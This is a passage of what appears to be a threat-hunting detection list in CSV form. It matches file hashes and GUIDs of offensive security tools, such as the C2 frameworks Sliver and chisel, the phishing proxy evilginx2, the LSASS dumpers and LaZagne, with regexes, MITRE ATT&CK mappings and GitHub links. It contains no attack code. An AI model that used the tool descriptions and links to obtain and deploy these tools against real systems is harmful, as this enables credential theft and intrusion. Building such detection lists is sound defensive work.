"*946D24E4-201B-4D51-AF9A-3190266E0E1B*",".{0,1000}946D24E4\-201B\-4D51\-AF9A\-3190266E0E1B.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e*",".{0,1000}948f609d447e622613e2b02500ec333867849aee711dcb146be75ddee92dd02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747*",".{0,1000}94a12554419e378df4acc76c0725d141738ecf1f991c74445d1e23c655278747.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*94AEDCE4-D4A2-45DB-B98E-860EE6BE8385*",".{0,1000}94AEDCE4\-D4A2\-45DB\-B98E\-860EE6BE8385.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb*",".{0,1000}94beb306747153d234f7da1d2c996cab68e19620e87d9f348979886910eb09cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3*",".{0,1000}94dc145b517036213443d4057d400296d40ffdcd50ba63f5304796060790c8a3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c*",".{0,1000}950bb21485106b135bbe1e28b8b7f74652cadeb9ae8c68342f0ee8c91ce8306c.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" 
"*950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408*",".{0,1000}950fd036a54ec99522231614375eff9aaa6dfff0414090b24b0f394c7810e408.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48*",".{0,1000}9521c213fdd6e0b58f1288a67dbbc2b178233e2d46d09feb8da1727520340d48.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91*",".{0,1000}952c94381c139e9d0b212d7f854ad261827e6694eac3e17b2c606ff9f54a7e91.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" 
"*95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd*",".{0,1000}95494fd45d6bc11bc49f1e41af352f896b7ada9c5eadeb029d6463def8bd60cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149*",".{0,1000}95650a1f11040590015b106d08d5453b09acdb02484ddce02f929953ca8a7149.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18*",".{0,1000}9567021fc5536372a9fb4eea5594d2665e676e88444cd2a017027513662fff18.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f*",".{0,1000}957e5ed833379f0a82f9424055e8b4159bbd205c291b1210bccf689cdfb22d0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*95A40D7C-F3F7-4C45-8C5A-D384DE50B6C9*",".{0,1000}95A40D7C\-F3F7\-4C45\-8C5A\-D384DE50B6C9.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*95BC2C38-1FBE-4AF1-967E-BC133250C4D4*",".{0,1000}95BC2C38\-1FBE\-4AF1\-967E\-BC133250C4D4.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054*",".{0,1000}95d19ae58bbd6b38b4988fae5c7b514c8451a15e940f1392bcf1f93374364054.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","file_hash","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" 
"*95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b*",".{0,1000}95dd437c805fb71cb3cda5f20ad9b212c44f14dc09194867125acb289af6301b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2*",".{0,1000}961281a6a9502553f68b61f2679a74dfd059fab22328e6f8dcce70c9dbfde0e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e*",".{0,1000}96da4a94f18030d87385e954b03d72c51aa2209acc07fd947ef83b89443c905e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b*",".{0,1000}971193eea29201f09ab21c42b5d03c63a5509d81b42158c2cf2b81bc8851ee8b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0*",".{0,1000}971f7d595c07fa302de6843e85ae22c771bc23a790f4092b5e6cd62fac985ab0.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe*",".{0,1000}9748cdfecb95fd7bb1706a566e79d3fccb1418bbb4307f7a7a1de1809db83afe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739*",".{0,1000}97499fbdae8e2c952f21da5834caf06b11dcc28d74b034b509bd174f3d1f1739.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*9786E418-6C4A-471D-97C0-8B5F2ED524C8*",".{0,1000}9786E418\-6C4A\-471D\-97C0\-8B5F2ED524C8.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" 
"*978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a*",".{0,1000}978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369*",".{0,1000}97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147*",".{0,1000}97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449*",".{0,1000}97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45*",".{0,1000}9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61*",".{0,1000}983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde*",".{0,1000}985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4*",".{0,1000}98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a*",".{0,1000}987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef*",".{0,1000}989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650*",".{0,1000}98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394*",".{0,1000}98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a*",".{0,1000}98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2*",".{0,1000}98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea*",".{0,1000}98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77*",".{0,1000}98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*",".{0,1000}99\$1a7F1qr2HihoXfs\/56u5XMdpDZ83N6hW\/HI\=.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583*",".{0,1000}9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374*",".{0,1000}99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b*",".{0,1000}992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952*",".{0,1000}9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae*",".{0,1000}9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - 